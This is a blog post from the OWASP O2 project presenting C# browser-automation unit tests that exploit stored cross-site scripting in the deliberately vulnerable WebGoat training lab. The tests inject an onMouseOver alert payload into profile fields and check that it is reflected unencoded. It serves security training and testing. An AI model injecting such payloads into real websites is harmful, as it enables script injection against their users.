OWASP O2 Platform Blog

WebGoat – First Example of O2 WebGoat API

This script and video show a first example of the API that will be developed under O2 to automate WebGoat’s functionality, lessons and exploits.

The WebGoat scripts are included in the local O2 Scripts folder and can also be seen here

Video: WebGoat – First Example of O2’s WebGoat API

Source Code: unit tests from WebGoat_BlackBox_Exploits.cs

        /// <summary>
        /// Opens the WebGoat main page, asserts that the returned HTML mentions "WebGoat",
        /// and clicks the "Start WebGoat" button when the page shows one.
        /// </summary>
        /// <returns>The literal "ok" once the page check has passed.</returns>
        public string Open_Main_Page()
        {
            setup();
            webGoat.openMainPage();

            // Sanity check that the browser reached WebGoat before any lesson is driven.
            var landingHtml = ie.html();
            var mentionsWebGoat = landingHtml.contains("WebGoat");
            Assert.That(mentionsWebGoat, "Could not find the word WebGoat in the default page");

            // The start button is optional: it is only clicked when the page shows it.
            if (ie.hasButton("Start WebGoat"))
            {
                var startButton = ie.button("Start WebGoat");
                startButton.flash().click();
            }

            return "ok";
        }

        /// <summary>
        /// Runs the Stage 1 stored-XSS walkthrough with the payload placed in the
        /// "address1" profile field.
        /// </summary>
        /// <returns>Whatever <c>Exploit_Stage_1_Stored_XSS</c> returns ("ok" on success).</returns>
        [Test]
        public string Exploit_Stage_1_Stored_XSS_OK()
        {
            // NOTE(review): the "_OK" suffix suggests this field echoes the payload back
            // without output encoding, so the helper's assertion passes; confirm against the lab.
            const string targetField = "address1";
            return Exploit_Stage_1_Stored_XSS(targetField);
        }

        /// <summary>
        /// Runs the Stage 1 stored-XSS walkthrough with the payload placed in the
        /// "description" profile field.
        /// </summary>
        /// <returns>Whatever <c>Exploit_Stage_1_Stored_XSS</c> returns ("ok" on success).</returns>
        [Test]
        public string Exploit_Stage_1_Stored_XSS_Fail()
        {
            // NOTE(review): the "_Fail" suffix suggests the helper's assertion is expected to
            // fail for this field (payload not echoed back as markup), which would make this
            // test red by design; confirm the intent.
            const string targetField = "description";
            return Exploit_Stage_1_Stored_XSS(targetField);
        }

        /// <summary>
        /// Drives the WebGoat "Stage 1: Stored XSS" lab through the browser: navigates to the
        /// lab, logs in, opens the profile editor, writes an HTML event-handler payload into the
        /// named field, saves the profile, and asserts that the handler attribute is present in
        /// the resulting page HTML.
        /// </summary>
        /// <param name="fieldToInsertPayload">Name of the profile form field that receives the payload.</param>
        /// <returns>The literal "ok" when the assertion holds.</returns>
        private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
        {
            const string payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
            // The marker is lower-case while the payload uses "onMouseOver"; presumably the
            // browser normalises attribute names in the HTML it reports (confirm).
            const string markerInPage = "onmouseover=\"javascript:alert('xss')\"";

            setup();
            webGoat.openMainPage();

            // Navigate to the lab. The "Stage 1" link is only highlighted here, not clicked.
            var categoryLink = ie.link("Cross-Site Scripting (XSS)");
            categoryLink.flash().click();
            var labLink = ie.link("LAB: Cross Site Scripting");
            labLink.flash().click();
            ie.link("Stage 1: Stored XSS").flash();

            // Log in with the password "larry" and pick the first entry of the second select list.
            var passwordField = ie.field("password");
            passwordField.flash().value("larry");
            ie.button("Login").flash().click();
            var firstEntry = ie.selectLists()[1].options()[0];
            firstEntry.select().flash();

            // Open the profile, switch to edit mode, write the payload and save.
            ie.button("ViewProfile").flash().click();
            ie.button("EditProfile").flash().click();
            var targetField = ie.field(fieldToInsertPayload);
            targetField.value(payload).flash();
            ie.button("UpdateProfile").flash().click();

            // The check shows only that the handler attribute came back as markup in the page,
            // i.e. the stored value was not output-encoded. It does not show that the script ran.
            var handlerPresent = ie.html().contains(markerInPage);
            Assert.That(handlerPresent, "Payload was not inserted into page");
            return "ok";
        }

        /// <summary>
        /// Navigates to the "Stage 1: Stored XSS" lesson and clicks "Restart this Lesson".
        /// </summary>
        /// <returns>The literal "ok" once the clicks have been issued; nothing is asserted.</returns>
        [Test]
        public string Stage_1_Stored_XSS_Restart_Lesson()
        {
            setup();
            webGoat.openMainPage();

            // Walk the menu down to the stage, highlighting each link before clicking it.
            var categoryLink = ie.link("Cross-Site Scripting (XSS)");
            categoryLink.flash().click();
            var labLink = ie.link("LAB: Cross Site Scripting");
            labLink.flash().click();
            var stageLink = ie.link("Stage 1: Stored XSS");
            stageLink.flash().click();

            // NOTE(review): presumably this resets lesson state, including any payload stored
            // by the exploit tests, so later runs start clean; confirm.
            var restartLink = ie.link("Restart this Lesson");
            restartLink.flash().click();

            return "ok";
        }

July 21, 2011 Posted by | videos, WebGoat | Leave a comment